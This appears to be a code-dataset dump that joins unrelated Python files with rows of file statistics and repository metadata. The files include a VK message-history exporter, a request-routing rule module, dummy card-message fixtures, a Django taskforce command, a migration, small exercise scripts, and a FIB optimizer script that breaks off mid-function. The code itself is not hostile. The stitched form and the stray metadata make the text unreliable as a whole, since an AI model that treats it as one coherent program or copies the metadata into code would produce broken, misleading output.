logger.setLevel(LOG_LEVEL)
loggerHandler = logging.FileHandler(logFile)
formatter = logging.Formatter("%(asctime)s:%(levelname)s:%(name)s %(message)s",
"[%d.%m.%Y %H:%M:%S]")
loggerHandler.setFormatter(formatter)
logger.addHandler(loggerHandler)
import vkapi as api
## Escaping xmpp non-allowed chars
badChars = [x for x in xrange(32) if x not in (9, 10, 13)] + [57003, 65535]
escape = re.compile("|".join(unichr(x) for x in badChars), re.IGNORECASE | re.UNICODE | re.DOTALL).sub
sortMsg = lambda msgOne, msgTwo: msgOne.get("mid", 0) - msgTwo.get("mid", 0)
require = lambda name: os.path.exists("extensions/%s.py" % name)
def registerHandler(type, handler):
EXTENSIONS.append(handler)
def loadExtensions(dir):
"""
Read and exec files located in dir
"""
for file in os.listdir(dir):
if not file.startswith("."):
execfile("%s/%s" % (dir, file), globals())
def execute(handler, list=()):
try:
result = handler(*list)
except SystemExit:
result = 1
except Exception:
result = -1
crashLog(handler.func_name)
return result
def apply(instance, args=()):
try:
code = instance(*args)
except Exception:
code = None
return code
def runThread(func, args=(), name=None):
thr = threading.Thread(target=execute, args=(func, args), name=name or func.func_name)
try:
thr.start()
except threading.ThreadError:
crashlog("runThread.%s" % name)
class VK(object):
"""
The base class containts most of functions to work with VK
"""
def __init__(self):
self.online = False
self.userID = 0
self.friends_fields = set(["screen_name"])
logger.debug("VK.__init__")
getToken = lambda self: self.engine.token
def checkData(self):
"""
Checks the token or authorizes by password
Raises api.TokenError if token is invalid or missed in hell
Raises api.VkApiError if phone/password is invalid
"""
logger.debug("VK: checking data")
if self.engine.token:
logger.debug("VK.checkData: trying to use token")
if not self.checkToken():
logger.error("VK.checkData: token invalid: %s" % self.engine.token)
raise api.TokenError("Token is invalid: %s" % (self.engine.token))
else:
raise api.TokenError("%s, Where the hell is your token?" % self.source)
def checkToken(self):
"""
Checks the api token
"""
try:
int(self.method("isAppUser", force=True))
except (api.VkApiError, TypeError):
return False
return True
def auth(self, token=None, raise_exc=False):
"""
Initializes self.engine object
Calls self.checkData() and initializes longPoll if all is ok
"""
logger.debug("VK.auth %s token" % ("with" if token else "without"))
self.engine = api.APIBinding(token=token)
try:
self.checkData()
except api.AuthError as e:
logger.error("VK.auth failed with error %s" % (e.message))
if raise_exc:
raise
return False
except Exception:
crashLog("VK.auth")
return False
logger.debug("VK.auth completed")
self.online = True
return True
def method(self, method, args=None, nodecode=False, force=False):
"""
This is a duplicate function of self.engine.method
Needed to handle errors properly exactly in __main__
Parameters:
method: obviously VK API method
args: method aruments
nodecode: decode flag (make json.loads or not)
force: says that method will be executed even the captcha and not online
See library/vkapi.py for more information about exceptions
Returns method result
"""
args = args or {}
result = {}
if not self.engine.captcha and (self.online or force):
try:
result = self.engine.method(method, args, nodecode)
except api.InternalServerError as e:
logger.error("VK: internal server error occurred while executing method(%s) (%s)" % (method, e.message))
except api.NetworkNotFound:
logger.critical("VK: network is unavailable. Is vk down or you have network problems?")
self.online = False
except api.VkApiError as e:
logger.error("VK: apiError %s" % (e.message))
self.online = False
return result
def disconnect(self):
"""
Stops all user handlers and removes himself from Poll
"""
logger.debug("VK: user has left")
self.online = False
runThread(self.method, ("account.setOffline", None, True, True))
def getFriends(self, fields=None):
"""
Executes friends.get and formats it in key-values style
Example: {1: {"name": "Pavel Durov", "online": False}
Parameter fields is needed to receive advanced fields which will be added in result values
"""
fields = fields or self.friends_fields
raw = self.method("friends.get", {"fields": str.join(chr(44), fields)}) or ()
friends = {}
for friend in raw:
uid = friend["uid"]
online = friend["online"]
name = escape("", str.join(chr(32), (friend["first_name"], friend["last_name"])))
friends[uid] = {"name": name, "online": online}
for key in fields:
if key != "screen_name": # screen_name is default
friends[uid][key] = friend.get(key)
return friends
def getMessages(self, count=5, mid=0):
"""
Gets last messages list count 5 with last id mid
"""
values = {"out": 0, "filters": 1, "count": count}
if mid:
del values["count"], values["filters"]
values["last_message_id"] = mid
return self.method("messages.get", values)
def getUserID(self):
"""
Gets user id and adds his id into jidToID
"""
self.userID = self.method("execute.getUserID")
return self.userID
def getUserData(self, uid, fields=None):
"""
Gets user data. Such as name, photo, etc
Will request method users.get
Default fields is ["screen_name"]
"""
if not fields:
fields = self.friends_fields
data = self.method("users.get", {"fields": ",".join(fields), "user_ids": uid}) or {}
if not data:
data = {"name": "None"}
for key in fields:
data[key] = "None"
else:
data = data.pop()
data["name"] = escape("", str.join(chr(32), (data.pop("first_name"), data.pop("last_name"))))
return data
def getMessageHistory(self, count, uid, rev=0, start=0):
"""
Gets messages history
"""
values = {"count": count, "user_id": uid, "rev": rev, "start": start}
return self.method("messages.getHistory", values)
format = "[%(date)s] <%(name)s> %(body)s\n"
if not os.path.exists("logs"):
os.makedirs("logs")
loadExtensions("extensions")
# https://oauth.vk.com/authorize?scope=69638&redirect_uri=https%3A%2F%2Foauth.vk.com%2Fblank.html&display=mobile&client_id=3789129&response_type=token
print "\nYou can get token over there: http://jabberon.ru/vk4xmpp.html"
token = raw_input("\nToken: ")
class User:
"""
A compatibility layer for vk4xmpp-extensions
"""
vk = VK()
user = User()
user.vk.auth(token)
user.vk.friends = user.vk.getFriends()
for friend in user.vk.friends.keys():
file = open("logs/%d.txt" % friend, "w")
start = 0
while True:
count = 200
rev = 0
messages = sorted(user.vk.getMessageHistory(count, friend, rev, start)[1:], sortMsg)
print "receiving messages for %d" % friend
if not messages or not messages[0]:
print "no messages for %d" % friend
file.close()
os.remove("logs/%d.txt" % friend)
break
last = messages[0]["mid"]
if last == start:
start = 0
break
start = last
for message in messages:
body = uHTML(message["body"])
iter = EXTENSIONS.__iter__()
for func in iter:
try:
result = func(user, message)
except Exception:
result = None
crashLog("handle.%s" % func.__name__)
if result is None:
for func in iter:
apply(func, (user, message))
break
else:
body += result
date = datetime.fromtimestamp(message["date"]).strftime("%d.%m.%Y %H:%M:%S")
name = user.vk.getUserData(message["from_id"])["name"]
file.write(format % vars())
print "Done. Check out the \"logs\" directory" | 26.884375 | 150 | 0.683018 | 1,222 | 8,603 | 4.762684 | 0.320786 | 0.015464 | 0.013402 | 0.007216 | 0.025773 | 0.009622 | 0 | 0 | 0 | 0 | 0 | 0.012274 | 0.176101 | 8,603 | 320 | 151 | 26.884375 | 0.80855 | 0.039405 | 0 | 0.159624 | 0 | 0 | 0.162253 | 0.004974 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.075117 | null | null | 0.018779 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52ba39cbc7fb572147ab2b78903b1a54e6357b9c | 11,085 | py | Python | rump/rule.py | bninja/rump | 3b6c4ff29974b3c04a260d8275567beebb296e5d | [
"0BSD"
] | 6 | 2015-07-27T09:02:36.000Z | 2018-07-18T11:11:33.000Z | rump/rule.py | bninja/rump | 3b6c4ff29974b3c04a260d8275567beebb296e5d | [
"0BSD"
] | null | null | null | rump/rule.py | bninja/rump | 3b6c4ff29974b3c04a260d8275567beebb296e5d | [
"0BSD"
] | null | null | null | import collections
import logging
import StringIO
from . import exc, Request, Expression
logger = logging.getLogger(__name__)
class CompiledRule(object):
"""
Compiled version of a routing rule.
`symbols`
A `rump.fields.Symbols` table used to store symbolic information used
in the compiled rule.
`expression`
The `rump.fields.Expression` which has been compiled.
`compiled`
Byte code for evaluating a `rump.fields.Expression`.
`upstream`
The `rump.Upstream` to be returned on a match.
You don't usually need to create these directly. Instead grab them from
the source `rump.Rule` like:
my_compiled_rule = rump.parser.for_rule()("my-rule-string").compile()
"""
def __init__(self, expression, upstream, symbols=None):
self.expression = expression
self.upstream = upstream
self.symbols = (
self.expression.symbols() if symbols is None else symbols
)
self.compiled = compile(
expression.compile(self.symbols), '<string>', 'eval'
)
def match_context(self, request_context):
"""
Determines whether a request represented by a context matches this rule.
:param context: A `rump.RequestContext`.
:return rump.Upstream:
If the request matches this rule then the associated upstream is
returned, otherwise None.
"""
matched = eval(self.compiled, None, request_context)
return self.upstream if matched else None
def match(self, request):
"""
Determines whether a request matches this rule.
:param request: A `rump.Request`.
:return rump.Upstream:
If the request matches this rule then the associated upstream is
returned, otherwise None.
"""
matched = self.match_context(request.context(self.symbols))
return self.upstream if matched else None
def __str__(self):
return '{0} => {1}'.format(str(self.expression), str(self.upstream))
def __eq__(self, other):
return (
isinstance(other, (Rule, CompiledRule)) and
self.expression == other.expression and
self.upstream == other.upstream
)
def __ne__(self, other):
return not self.__eq__(other)
class Rule(object):
"""
Represents a "routing" rule used to match requests to an upstream.
`expression`
A `rump.fields.Expression`.
`upstream`
The `rump.Upstream` to be returned on a match.
There are two ways to express a Rule:
- A `rump.fields.Expression`.
- String, see `rump.rule.grammar` for the grammar.
If you have a string just do something like:
rule = rump.parser.for_rule()("my-rule-string")
"""
compiled_type = CompiledRule
def __init__(self, expression, upstream):
self.expression = expression
self.upstream = upstream
def match(self, request):
"""
Determines whether a request matches this rule.
:param request: The rump.Request to evaluate for a match.
:param cache: Optional map used to cache request field lookups.
:return rump.Upstream:
If the request matches this rule then the associated upstream is
returned, otherwise None.
"""
matched = self.expression(request)
return self.upstream if matched else None
def compile(self, symbols=None):
"""
Compiles this rule.
:param symbols:
A `rump.fields.Symbols` table used to store symbolic information
used in the compiled rule.
:return CompiledRule: The equivalent compiled rule.
"""
return CompiledRule(self.expression, self.upstream, symbols)
def __str__(self):
return '{0} => {1}'.format(self.expression, self.upstream)
def __eq__(self, other):
return (
isinstance(other, (Rule, CompiledRule)) and
self.expression == other.expression and
self.upstream == other.upstream
)
def __ne__(self, other):
return not self.__eq__(other)
class Rules(collections.MutableSequence):
"""
A collection of "routing" rules used to match requests to an upstream.
`request_type`
Specification of the requests these rules will be matching. Defaults
to `rump.Request`.
`compile`
Flag determining whether added rules are compiled.
`strict`
Flag determining whether added rules are compiled.
`auto_disable`
Flag determining whether to auto disable a rule that generates and
error when attempting to match a request.
"""
def __init__(self, *rules, **options):
self._parse_rule = None
self.symbols = None
self._compile = False
self.disabled = set()
self._rules = []
if len(rules) == 1 and isinstance(rules[0], list):
rules = rules[0]
for rule in rules:
self._rules.append(rule)
# options
self.request_type = options.pop('request_type', Request)
self.compile = options.pop('compile', False)
self.strict = options.pop('strict', True)
self.auto_disable = options.pop('auto_disable', False)
if options:
raise TypeError(
'Unexpected keyword argument {0}'.format(options.keys()[0])
)
@property
def compile(self):
return self._compile
@compile.setter
def compile(self, value):
if value == self._compile:
return
self._compile = value
if self._compile:
self.symbols = Expression.symbols()
for i in xrange(len(self)):
self[i] = Rule(
self[i].expression, self[i].upstream
).compile(self.symbols)
else:
self.symbols = None
for i in xrange(len(self)):
self[i] = Rule(self[i].expression, self[i].upstream)
@property
def parse_rule(self):
from . import parser
if not self._parse_rule:
self._parse_rule = parser.for_rule(self.request_type)
return self._parse_rule
def load(self, io, strict=None):
strict = self.strict if strict is None else strict
for i, line in enumerate(io):
line = line.strip()
if not line or line.startswith('#'):
continue
try:
rule = self.parse_rule(line)
except exc.ParseException, ex:
if strict:
raise
logger.warning(
'%s, line %s, unable to parse rule - %s, skipping',
getattr(io, 'name', '<memory>'), i, ex,
)
continue
self.append(rule)
return self
def loads(self, s, strict=None):
io = StringIO.StringIO(s)
return self.load(io, strict=strict)
def dump(self, io):
for rule in self:
io.write(str(rule))
io.write('\n')
def dumps(self):
io = StringIO.StringIO()
self.dump(io)
return io.getvalue()
def disable(self, i):
self.disabled.add(self[i])
def disable_all(self):
self.disabled = set(self)
def enable(self, i):
self.disabled.remove(self[i])
def enable_all(self):
self.disabled.clear()
def match(self, request, error=None):
if error is None:
error = 'suppress' if self.auto_disable is False else 'disable'
if error not in ('raise', 'disable', 'suppress'):
raise ValueError('error={0} invalid'.format(error))
return (
self._match_compiled if self.compile else self._match
)(request, error)
def _match_compiled(self, request, error):
i, count, request_ctx = 0, len(self), request.context(self.symbols)
while True:
try:
while i != count:
if self[i] not in self.disabled:
upstream = self[i].match_context(request_ctx)
if upstream:
return upstream
i += 1
break
except StandardError:
raise
except Exception as ex:
if error == 'raise':
raise
logger.exception('[%s] %s match failed - %s\n', i, self[i], ex)
if error == 'disable':
self.disabled.add(self[i])
i += 1
def _match(self, request, error):
i, count = 0, len(self)
while True:
try:
while i != count:
if self[i] not in self.disabled:
upstream = self[i].match(request)
if upstream:
return upstream
i += 1
break
except StandardError:
raise
except Exception as ex:
if error == 'raise':
raise
logger.exception('[%s] %s match failed - %s\n', self[i], i, ex)
if error == 'disable':
self.disabled.add(self[i])
i += 1
def __str__(self):
return str(self._rules)
def __eq__(self, other):
return (
(isinstance(other, Rules) and self._rules == other._rules) or
(isinstance(other, list) and self._rules == other)
)
def __ne__(self, other):
return not self.__eq__(other)
# collections.MutableSequence
def __getitem__(self, key):
return self._rules[key]
def __setitem__(self, key, value):
if isinstance(value, basestring):
rule = self.parse_rule(value)
elif isinstance(value, Rule):
rule = value
elif isinstance(value, Rule.compiled_type):
rule = Rule(value.expression, value.upstream)
else:
raise TypeError(
'{0} is not a string, Rule or CompiledRule'.format(value)
)
if self.compile:
rule = rule.compile(self.symbols)
self._rules[key] = rule
def __delitem__(self, key):
self.disabled.difference_update(self.__getitem__(key))
self._rules.__delitem__(key)
def __len__(self):
return len(self._rules)
def insert(self, key, value):
if isinstance(value, basestring):
rule = self.parse_rule(value)
elif isinstance(value, Rule):
rule = value
elif isinstance(value, Rule.compiled_type):
rule = Rule(value.expression, value.upstream)
else:
raise ValueError(
'{0} is not a string, Rule or CompiledRule'.format(value)
)
if self.compile:
rule = rule.compile(self.symbols)
self._rules.insert(key, rule)
| 29.959459 | 80 | 0.564727 | 1,245 | 11,085 | 4.909237 | 0.163052 | 0.014725 | 0.014889 | 0.017997 | 0.464005 | 0.4393 | 0.424902 | 0.387598 | 0.358639 | 0.353076 | 0 | 0.002462 | 0.34055 | 11,085 | 369 | 81 | 30.04065 | 0.833653 | 0.003157 | 0 | 0.434978 | 0 | 0 | 0.044916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.022422 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52bde9994c231b7dab0757f34ebf002f12e33370 | 951 | py | Python | tests/__init__.py | adelosa/cardutil | fa31223aaac1f0749d50368bb639a311d98e279a | [
"MIT"
] | null | null | null | tests/__init__.py | adelosa/cardutil | fa31223aaac1f0749d50368bb639a311d98e279a | [
"MIT"
] | 1 | 2022-03-25T20:15:24.000Z | 2022-03-30T09:20:34.000Z | tests/__init__.py | adelosa/cardutil | fa31223aaac1f0749d50368bb639a311d98e279a | [
"MIT"
] | null | null | null | import binascii
def print_stream(stream, description):
stream.seek(0)
data = stream.read()
print('***' + description + '***')
print(data)
stream.seek(0)
def test_message(encoding='ascii', hex_bitmap=False):
binary_bitmap = b'\xF0\x10\x05\x42\x84\x61\x80\x02\x02\x00\x00\x04\x00\x00\x00\x00'
bitmap = binary_bitmap
if hex_bitmap:
bitmap = binascii.hexlify(binary_bitmap)
return (
'1144'.encode(encoding) +
bitmap +
('164444555544445555111111000000009999150815171500123456789012333123423579957991200000'
'012306120612345612345657994211111111145BIG BOBS\\80 KERNDALE ST\\DANERLEY\\3103 VIC'
'AUS0080001001Y99901600000000000000011234567806999999').encode(encoding))
message_ascii_raw = test_message()
message_ebcdic_raw = test_message('cp500')
message_ascii_raw_hex = test_message(hex_bitmap=True)
message_ebcdic_raw_hex = test_message('cp500', hex_bitmap=True)
| 32.793103 | 95 | 0.729758 | 105 | 951 | 6.390476 | 0.457143 | 0.081967 | 0.032787 | 0.050671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274314 | 0.156677 | 951 | 28 | 96 | 33.964286 | 0.562344 | 0 | 0 | 0.090909 | 0 | 0.045455 | 0.324921 | 0.254469 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.045455 | 0 | 0.181818 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52bf9e552405d6d0c21e5f6ccdaebea54d983579 | 2,089 | py | Python | management/commands/start_taskforce.py | mallipeddi/django-taskforce | dd7aa1eae508b15428dd0fe9c2be969a75038890 | [
"BSD-3-Clause"
] | 3 | 2015-11-05T06:07:22.000Z | 2021-11-08T11:21:51.000Z | management/commands/start_taskforce.py | mallipeddi/django-taskforce | dd7aa1eae508b15428dd0fe9c2be969a75038890 | [
"BSD-3-Clause"
] | null | null | null | management/commands/start_taskforce.py | mallipeddi/django-taskforce | dd7aa1eae508b15428dd0fe9c2be969a75038890 | [
"BSD-3-Clause"
] | null | null | null | import sys
from optparse import make_option
from django.core.management.base import BaseCommand
from django.conf import settings
import taskforce
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--verbose', action='store_true', dest='verbose',
help = 'Verbose mode for you control freaks'),
make_option('--foreground', action='store_true', dest='foreground',
help = 'Run the server in the foreground.'),
)
help = """Start taskforce server."""
args = "[thread-pool-size]"
def _log(self, msg, error=False):
if self._verbose or error:
print msg
def handle(self, *args, **options):
# handle command-line options
self._verbose = options.get('verbose', False)
self._foreground = options.get('foreground', False)
if len(args) == 0:
pool_size = 5
elif len(args) == 1:
pool_size = int(args[0])
else:
self._log("ERROR - Takes in exactly 1 optional arg. %d were supplied." % len(args), error=True)
sys.exit(1)
address, port = taskforce.utils.get_server_loc()
available_tasks = []
for app_name in settings.INSTALLED_APPS:
app_mod = __import__(app_name, {}, {}, ['tasks'])
if hasattr(app_mod, 'tasks'):
for k in app_mod.tasks.__dict__.values():
if isinstance(k, type) and issubclass(k, taskforce.BaseTask):
available_tasks.append(k)
self._log("Starting Taskforce server...")
if self._foreground:
from taskforce.http import runserver
runserver(available_tasks, pool_size, (address, port))
else:
from taskforce.http import TaskforceDaemon
TaskforceDaemon(
"/tmp/taskforce.pid",
stdout="/tmp/taskforce.out.log",
stderr="/tmp/taskforce.err.log",
).start(available_tasks, pool_size, (address,port))
| 36.017241 | 107 | 0.581618 | 232 | 2,089 | 5.073276 | 0.418103 | 0.033985 | 0.035684 | 0.032285 | 0.056075 | 0.056075 | 0 | 0 | 0 | 0 | 0 | 0.004141 | 0.306367 | 2,089 | 57 | 108 | 36.649123 | 0.808144 | 0.012925 | 0 | 0.043478 | 0 | 0 | 0.166019 | 0.021359 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.173913 | null | null | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c00979320f1e4a0f34214d8d935b0833088713 | 521 | py | Python | profiles/migrations/0004_profile_smapply_user_data.py | umarmughal824/bootcamp-ecommerce | 681bcc788a66867b8f240790c0ed33680b73932b | [
"BSD-3-Clause"
] | 2 | 2018-06-20T19:37:03.000Z | 2021-01-06T09:51:40.000Z | profiles/migrations/0004_profile_smapply_user_data.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 1,226 | 2017-02-23T14:52:28.000Z | 2022-03-29T13:19:54.000Z | profiles/migrations/0004_profile_smapply_user_data.py | umarmughal824/bootcamp-ecommerce | 681bcc788a66867b8f240790c0ed33680b73932b | [
"BSD-3-Clause"
] | 3 | 2017-03-20T03:51:27.000Z | 2021-03-19T15:54:31.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-09-13 18:42
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("profiles", "0003_profile_smapply_id")]
operations = [
migrations.AddField(
model_name="profile",
name="smapply_user_data",
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
)
]
| 26.05 | 88 | 0.677543 | 62 | 521 | 5.516129 | 0.725806 | 0.076023 | 0.122807 | 0.157895 | 0.187135 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053269 | 0.207294 | 521 | 19 | 89 | 27.421053 | 0.774818 | 0.132438 | 0 | 0 | 1 | 0 | 0.122494 | 0.051225 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c0834ff93f1ed8d51ad80ac5952cb23df17269 | 250 | py | Python | Lists/list_of_beggars.py | petel3/Softuni_education | 4fd80f8c6ce6c3d6a838edecdb091dda2ed1084c | [
"MIT"
] | 2 | 2022-03-05T13:17:12.000Z | 2022-03-05T13:17:16.000Z | Lists/list_of_beggars.py | petel3/Softuni_education | 4fd80f8c6ce6c3d6a838edecdb091dda2ed1084c | [
"MIT"
] | null | null | null | Lists/list_of_beggars.py | petel3/Softuni_education | 4fd80f8c6ce6c3d6a838edecdb091dda2ed1084c | [
"MIT"
] | null | null | null | string = input().split(", ")
beggars = int(input())
beggars_list = []
for x in range(0, beggars):
temp = string[x::beggars]
for j in range(0, len(temp)):
temp[j] = int(temp[j])
beggars_list.append(sum(temp))
print(beggars_list) | 20.833333 | 34 | 0.616 | 38 | 250 | 3.973684 | 0.447368 | 0.218543 | 0.10596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01 | 0.2 | 250 | 12 | 35 | 20.833333 | 0.745 | 0 | 0 | 0 | 0 | 0 | 0.007968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c2f493c965a91dab85655d544b65075ea9b225 | 1,978 | py | Python | python/locate_2D_array1.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/locate_2D_array1.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/locate_2D_array1.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | 1 | 2020-08-29T17:12:52.000Z | 2020-08-29T17:12:52.000Z | # python to locate 1 in a 2D array
#below save it into a dictionary
# python to locate 1 in a 2D array
def check_zero(array1):
d = {}
print("array index zeros at:")
for i in range(len(array1)):
index = [k for k, v in enumerate(array1[i]) if v == 0]
d[i] = index
#print(i, index)
#print(d)
return(d)
array1 = [
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 1]
]
array2 = [
[1, 1, 0, 0, 0],
[0, 0, 1, 1, 0],
[0, 0, 1, 0, 1]
]
print(check_zero(array1))
print(check_zero(array2))
'''
array index zeros at:
{0: [2, 3], 1: [0, 1], 2: [0, 2]}
array index zeros at:
{0: [2, 3, 4], 1: [0, 1, 4], 2: [0, 1, 3]}
'''
# below is a function
def check_zero(array1):
print("array index zeros at:")
for i in range(len(array1)):
index = [k for k, v in enumerate(array1[i]) if v == 0]
print(i, index)
return(i,index)
array1 = [
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 1]
]
array2 = [
[1, 1, 0, 0, 0],
[0, 0, 1, 1, 0],
[0, 0, 1, 0, 1]
]
check_zero(array1)
check_zero(array2)
'''
array index zeros at:
0 [2, 3]
1 [0, 1]
2 [0, 2]
array index zeros at:
0 [2, 3, 4]
1 [0, 1, 4]
2 [0, 1, 3]
'''
array1 = [
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 1]
]
for i in range(len(array1)):
index = [ k for k,v in enumerate(array1[i]) if v ==0 ]
print(i, index)
'''
outputs
0 [2, 3]
1 [0, 1]
2 [0, 2]
'''
''' very primitive below,
for i in range(0,3):
for j in range(0,4):
if (array1[i][j] == 1):
print(i,j)
'''
'''
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.nonzero.html
# not done yet
# import numpy
array2 = numpy.array([
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 0, 0, 0]])
print(numpy.nonzero(array2))
'''
# https://stackoverflow.com/questions/27175400/how-to-find-the-index-of-a-value-in-2d-array-in-python
'''
outputs from for i,j loop
D:\Go-workspace\walter\coding\python>python locate_zero.py
0 0
0 1
1 2
1 3
2 1
2 3
'''
| 14.87218 | 101 | 0.532356 | 378 | 1,978 | 2.767196 | 0.193122 | 0.055449 | 0.054493 | 0.034417 | 0.513384 | 0.508604 | 0.507648 | 0.507648 | 0.459847 | 0.440727 | 0 | 0.12731 | 0.261375 | 1,978 | 132 | 102 | 14.984848 | 0.588638 | 0.120829 | 0 | 0.711111 | 0 | 0 | 0.043121 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0 | 0 | 0.044444 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c49ba6e0f3c37a7b4d0399f526ea22dc7636df | 7,711 | py | Python | fib_optimizer/fib_optimizer.py | dbarrosop/sir_tools | 0c325eb8ea9667ecdc9da4f524ef2224b098fc81 | [
"Apache-2.0"
] | 9 | 2015-09-13T20:00:52.000Z | 2018-04-04T09:07:55.000Z | fib_optimizer/fib_optimizer.py | dbarrosop/sir_tools | 0c325eb8ea9667ecdc9da4f524ef2224b098fc81 | [
"Apache-2.0"
] | 2 | 2015-09-28T14:12:41.000Z | 2017-03-02T16:29:48.000Z | fib_optimizer/fib_optimizer.py | dbarrosop/sir_tools | 0c325eb8ea9667ecdc9da4f524ef2224b098fc81 | [
"Apache-2.0"
] | 5 | 2015-09-28T13:54:02.000Z | 2016-04-19T23:50:34.000Z | #!/usr/bin/env python
from pySIR.pySIR import pySIR
import argparse
import datetime
import json
import os
import shlex
import subprocess
import sys
import time
import logging
logger = logging.getLogger('fib_optimizer')
log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.DEBUG, format=log_format)
'''
def _split_tables(s):
lem = list()
lpm = list()
for p in s:
if p.split('/')[1] == '24':
lem.append(p)
else:
lpm.append(p)
return lem, lpm
def get_bgp_prefix_lists():
bgp_p = sir.get_bgp_prefixes(date=end_time).result
p = list()
for router, prefix_list in bgp_p.iteritems():
for prefix in prefix_list:
p.append(prefix)
return _split_tables(p)
def inc_exc_prefixes():
i_lem, i_lpm = _split_tables(conf['include_prefixes'])
e_lem, e_lpm = _split_tables(conf['exclude_prefixes'])
return i_lem, i_lpm, e_lem, e_lpm
def complete_prefix_list():
def _complete_pl(pl, bgp_pl, num):
if len(pl) < num:
num = num - len(pl)
for prefix in bgp_pl:
if prefix not in pl:
pl.append(prefix)
num -= 1
if num == 0:
break
return pl
else:
return pl
lem_pl = _complete_pl(lem_prefixes, bgp_lem, conf['max_lem_prefixes'])
lpm_pl = _complete_pl(lpm_prefixes, bgp_lpm, conf['max_lpm_prefixes'])
return lem_pl, lpm_pl
'''
def get_variables():
logger.debug('Getting variables from SIR')
v = sir.get_variables_by_category_and_name('apps', 'fib_optimizer').result[0]
logger.debug('Configuration: {}'.format(json.loads(v['content'])))
return json.loads(v['content'])
def get_date_range():
# These are dates for which we have flows. We want to "calculate" the range we want to use
# to calculate the topN prefixes
logger.debug('Getting available dates')
dates = sir.get_available_dates().result
if len(dates) < conf['age']:
sd = dates[0]
else:
sd = dates[-conf['age']]
ed = dates[-1]
logger.debug("Date range: {} - {}".format(sd, ed))
time_delta = datetime.datetime.now() - datetime.datetime.strptime(ed, '%Y-%m-%dT%H:%M:%S')
if time_delta.days > 2:
msg = 'Data is more than 48 hours old: {}'.format(ed)
logger.error(msg)
raise Exception(msg)
return sd, ed
def get_top_prefixes():
logger.debug('Getting top prefixes')
# limit_lem = int(conf['max_lem_prefixes']) - len(inc_lem) + len(exc_lem)
limit_lem = int(conf['max_lem_prefixes'])
lem = [p['key'] for p in sir.get_top_prefixes(
start_time=start_time,
end_time=end_time,
limit_prefixes=limit_lem,
net_masks=conf['lem_prefixes'],
filter_proto=4,).result]
# limit_lpm = int(conf['max_lpm_prefixes']) - len(inc_lpm) + len(exc_lpm)
limit_lpm = int(conf['max_lpm_prefixes'])
